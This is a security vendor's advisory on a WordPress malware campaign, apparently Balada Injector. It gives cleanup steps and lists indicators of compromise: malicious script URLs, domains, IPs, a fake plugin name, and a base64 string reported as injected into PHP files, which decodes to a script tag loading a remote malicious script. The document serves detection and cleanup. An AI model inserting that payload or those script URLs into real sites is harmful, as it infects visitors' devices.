If you website contains content – such as scripts or images loaded from either line.beatylines.com or fire.descriptionscripts.com domain, you can follow these steps:
MAGEFIX SecurityMalware cleanup & protection
Try our Free site check.
- Temporarily disable public access to your website, to prevent data loss and to protect visitors from having their computers and phones infected with adware.
- Check the main hosting gates to the web files, such as FTP accounts, SSH access, Cron jobs.
- Backup the web files and site’s database.
- Proceed with a thorough cleanup, making sure the are no malware or vulnerable site components left.
- Check the Google search results for SEO spam by typing “site:example.com”, where you can replace example.com with your own domain name.
- Perform a blacklist check using Sucuri tool, Virustotal, site24x7.com and MxToolbox.
- Restore the site, apply all the necessary updates and monitor it closely.
Malicious plugins: Wp sleaper, wp-sleaper, wp-sleaper.com
URLs:
https://block.descriptionscripts.com/scripts/souce.js
https://news.weatherplllatform.com/counter.js
https://away.trackersline.com
https://track.violetlovelines.com/src/jack.js
https://block.descriptionscripts.com/src/source.js
https://block.descriptionscripts.com/src/template.js
http://descriptionscripts.com/steps/one.js?v=33
https://fire.descriptionscripts.com/get.php?wid=215315&sid=32463463&gid=24563463&kid=lonely
https://line.beatylines.com/src/main.js
https://line.beatylines.com/src/type.js?v=2.1.1
https://tratbc.com/tb?h=waWQiOjEwNTQwMzAsInNpZCI6MTE5NjU2OSwid2lkIjo0NDAyODksInNyYyI6Mn0=eyJ&si1=&si2=
https://datingspicyhere.life/?u=875kd01&o=46zmlec&t=a440289&cid=wgb0709ifatkud8o2irvcf18
Related URLs:
https://cdn.statisticline.com/scripts/swaynew.js
https://record.findtrustclicks.com/state.js
https://back.firstblackphase.com/mbRB96
Base64 injected in PHP files, including index.php and wp-blog-header.php.
PHNjcmlwdCBzcmM9J2h0dHBzOi8vYmxvY2suZGVzY3JpcHRpb25zY3JpcHRzLmNvbS9zY3JpcHRzL3NvdWNlLmpzP3Y9MS4wLjMnIHR5cGU9J3RleHQvamF2YXNjcmlwdCc+PC9zY3JpcHQ+
Malicious domains: desirebluestock.com, 0.desirepurplestock.com, buyadvupfor24.com, track.wbdpnz.com, noomigoomini.com, tratbc.com, datingspicyhere.life, line.beatylines.com, fire.descriptionscripts.com, descriptionscripts.com, shbzek.com, haxbyq.com, ulmoyc.com.
Malicious IPs: 116.202.2.30, 185.56.234.205, 45.9.148.27, 2.59.222.113 ASN AS209155, 54.162.51.18.
Related Twitter posts
New line.beatylines[.]com wave of Balada Injector.https://t.co/21IDghU8i0https://t.co/NltZnUxyHg
For example, injections via the fake wp_resortpack plugin (it also has NDSW / SocGholish part). Thanks @riper81
Re: https://t.co/YDzv8ntLhu pic.twitter.com/wh4gECzQPj
— Denis (@unmaskparasites) April 25, 2023
Need help?
Try our Free site check.